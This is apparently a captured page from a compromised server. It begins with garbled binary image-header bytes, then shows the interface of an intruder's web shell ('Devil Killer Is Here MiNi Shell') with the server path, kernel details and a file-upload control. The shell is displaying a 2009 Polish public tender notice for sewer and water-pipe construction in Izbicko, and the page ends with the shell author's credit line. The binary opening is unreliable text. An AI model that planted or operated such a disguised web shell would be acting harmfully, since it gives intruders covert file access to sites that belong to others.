JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090512/144216-N-2009.html

<p class="kh_header"><b>Izbicko: Budowa kanalizacji sanitarnej wraz z rozdielczą siecią wodociągową we wsi Otmice gm. Izbicko - etap I,II</b><br>
<b>Numer ogłoszenia: 144216 - 2009; data zamieszczenia: 12.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Izbicko , ul. Powstańców Śląskich 12, 47-180 Izbicko, woj. opolskie, tel. 0-77 461 72 21, faks 0-77 463 12 54.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.izbicko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej wraz z rozdielczą siecią wodociągową we wsi Otmice gm. Izbicko - etap I,II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach realizacji zamówienia należy wykonać:


1.    10,176 km rurociągów kanalizacji sanitarnej grawitacyjnej, w tym:

a) finansowanych ze środków pomocowych jako kwalifikowane:
    7,496km rurociągów kanalizacji sanitarnej grawitacyjnej
b) finansowanych ze środków własnych zamawiającego:
    2,680km rurociągów kanalizacji sanitarnej grawitacyjnej

2.     2,844 km rurociągów kanalizacji sanitarnej tłocznej, w tym:

a) finansowanych ze środków pomocowych jako kwalifikowane:
     1,530km rurociągów kanalizacji sanitarnej tłocznej
b) finansowanych ze środków własnych zamawiającego:
     1,314km rurociągów kanalizacji sanitarnej tłocznej

3.    zmodernizować łącznie 10,5355 km rurociągów wodociągowych w tym:

a) finansowanych ze środków pomocowych jako kwalifikowane:
      5,766 km rurociągów wodociągowych
b) finansowanych ze środków własnych zamawiającego:
      4,7695 km rurociągów wodociągowych
4.   pompownie ścieków - 4 sztuki - finansowane ze środków pomocowych jako kwalifikowane

5.  Zadanie będzie realizowane jednocześnie w dwóch etapach.

6.Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa i  specyfikacja techniczna wykonania i odbioru robót budowlanych (STWiOR)  stanowiące załączniki do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.23.24.23-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia wadium w wysokości 150 000 PLN. Wadium, zgodnie z  wyborem wykonawcy, może być wniesione w jednej lub kilku formach : 
      - pieniądzu - przelewem na rachunek bankowy Zamawiającego, prowadzonym przez  Bank Spółdzielczy w Leśnicy, Filia w Izbicku Nr rachunku: 34 8907 1076 2006 5000 2017 0005;
      -	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym ze poręczenie kasy jest poręczeniem wyłącznie pieniężnym ;
      -  gwarancjach bankowych;
      - gwarancjach ubezpieczeniowych;
      - 	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt.2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. Nr 42, poz. 275 z 2007r.).
  2.  Wadium należy wnieść przed upływem terminu składania ofert.
  3. Wadium wniesione w innej formie niż pieniądz należy w oryginale złożyć w kasie Urzędu Gminy w Izbicku ul. Powstańców  Śląskich 12; 47-180 Izbicko, pokój nr 11.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawca winien spełniać warunki udziału w postepowaniu, o których mowa w art. 22 ust.1 ustawy Pzp, tj. : 
1. Wykonawca winien posiadać uprawnienia do wykonywania określonej działalności lub czynności;
2.Wykonawca winien posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3. Wykonawca winien znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4. Wykonawca nie powinien podlegać wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Pzp.

Ocena spełniania warunków udziału w postępowaniu nastapi w oparciu o wymagane dokumenty i oświadczenia, o0 których mowa niżej, wg. formuły: spełnia/ nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.1 aktualny odpis z właściwego rejestru albo aktualnego zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
1.2 aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS-u lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert  
 1.3 aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8  ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
1.4 aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-9  ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia w/w warunki muszą spełniać odrębnie wszyscy wykonawcy składający ofertę wspólną.

2.1 wykaz robót budowlanych, zawierający rodzaj, datę i miejsce wykonania, wykonanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, polegających na:
2.1.1 budowie kanalizacji sanitarnej, w ramach jednej umowy o długości nie mniejszej niż 6 km lub   wykonanych w ramach nie więcej niż dwóch umów o długości łącznej nie mniejszej niż 6 km;
2.1.2  budowie sieci wodociągowej, w ramach jednej umowy  o długości nie mniejszej niż 7 km lub wykonanych w ramach nie więcej niż trzech umów o długości łącznej nie mniejszej niż 7 km;
2.1.3    budowie/montażu nie mniej niż 2 szt. sieciowych pompowni ścieków.

Wykonawca winien załączyć dokument/dokumenty potwierdzające, że wykazane roboty (obejmujące minimalny wymagany zakres jak w pkt. 2.1.1; 2.1.2; 2.1.3) zostały wykonane należycie.   

2.2 wykaz osób (na załączniku nr 4 do SIWZ), którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz dokumentów potwierdzających, że osoby które będą uczestniczyć w wykonaniu zamówienia posiadają uprawnienia budowlane do kierowania robotami budowlanymi w specjalności:

2.2.1 instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, potwierdzonymi stosownymi decyzjami, o których mowa w art. 12 ust. 2 lub 12a ustawy z dnia 07.07.1994r. Prawo budowlane (tekst jednolity: dz. U. Nr 156, poz. 1118 z 2006r. ze zmianami), lub odpowiadające im uprawnienia uzyskane na podstawie wcześniej obowiązujących przepisów, z wykazaniem co najmniej 5 lat doświadczenia na stanowisku kierownika budowy (w rozumieniu Prawa budowlanego), w tym kierowaniem co najmniej 2 robotami budowlanymi dot. budowy sieci wodociągowej i kanalizacyjnej - 2 osoby;
2.2.2 instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, potwierdzonymi stosownymi decyzjami, o których mowa w art. 12 ust. 2 lub 12a ustawy z dnia 07.07.1994r. Prawo budowlane (tekst jednolity: dz. U. Nr 156, poz. 1118 z 2006r. ze zmianami), lub odpowiadające im uprawnienia uzyskane na podstawie wcześniej obowiązujących przepisów, z wykazaniem doświadczenia w wykonaniu robót elektrycznych związanych z budową/montażem co najmniej 2 sieciowych przepompowni ścieków - 1 osoba;
2.2.3 konstrukcyjno-budowlanej, potwierdzonymi stosownymi decyzjami, o których mowa w art. 12 ust. 2 lub 12a  ustawy z dnia 07.07.1994r. Prawo budowlane (tekst jednolity: dz. U. Nr 156, poz. 1118 z 2006r. ze zmianami), lub odpowiadające im uprawnienia uzyskane na podstawie wcześniej obowiązujących przepisów, z wykazaniem doświadczenia w wykonaniu robót konstrukcyjno-budowlanych związanych z budową/montażem co najmniej 2 sieciowych przepompowni ścieków - 1 osoba; 
Wymaga się aby Wykonawca załączył do oferty aktualny dokument potwierdzający przynależność tych osób do Izby Inżynierów Budownictwa.
W przypadku, gdy wykonawca w wykazie przedstawi osoby zdolne do wykonania zamówienia a, którymi będzie dysponował w czasie realizacji zamówienia, do oferty winien załączyć pisemne zobowiązanie innych podmiotów do udostępnienia tych osób na czas realizacji przedmiotu zamówienia. 
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia w/w warunki mogą spełniać łącznie.
3.1 Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę nie mniejszą niż 15% ceny ofertowej brutto, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
3.2 polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 2 000 000 PLN. 
 W przypadku, gdy ubezpieczenie opłacane jest ratalnie, Wykonawca winien udokumentować iż nie posiada zaległości w opłaceniu składek ratalnych. 
 W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia warunek opisany w pkt. 3.1 mogą spełniać łącznie; warunek opisany w pkt. 3.2 musi spełniać odrębnie każdy z wykonawców składający ofertę wspólną, przy czym określona wysokość ubezpieczenia może być łączna.

Jeśli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,  to:
1. zamiast dokumentów, o których mowa w pkt. 1.1; 1.2; 1.4 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że : 
a. nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b. nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c. nie orzeczono wobec niego zakazu ubiegania się o zamówienie;  
 2.  zamiast dokumentu, o którym mowa w pkt. 1.3 składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy;   
 3.  Dokumenty, o których mowa w ust. 1 lit. a i c oraz w pkt. 2, winny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w ust. 1 lit.. b, winien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
 4. Jeżeli w kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust.1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Zasadę opisaną w ust. 3 stosuje się odpowiednio..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.izbicko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Izbicku ul. Powtsńców Śląskich 12; 47-180 Izbicko.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2009 godzina 14:00, miejsce: Urząd Gminy w Izbicku ul. Powtsńców Śląskich 12; 47-180 Izbicko
sekretariat na I piętrze, pokój nr 7.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com